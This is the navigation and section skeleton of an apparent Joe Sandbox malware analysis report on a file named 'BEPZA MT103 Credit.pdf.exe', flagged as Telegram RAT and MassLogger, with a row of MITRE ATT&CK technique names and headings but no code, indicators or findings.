DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	31 Virtualization/Sandbox Evasion	DCSync	1 System Network Configuration Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	111 Process Injection	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report BEPZA MT103 Credit.pdf.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Telegram RAT

Threatname: MassLogger

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Persistence and Installation Behavior

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Windows Analysis Report
BEPZA MT103 Credit.pdf.exe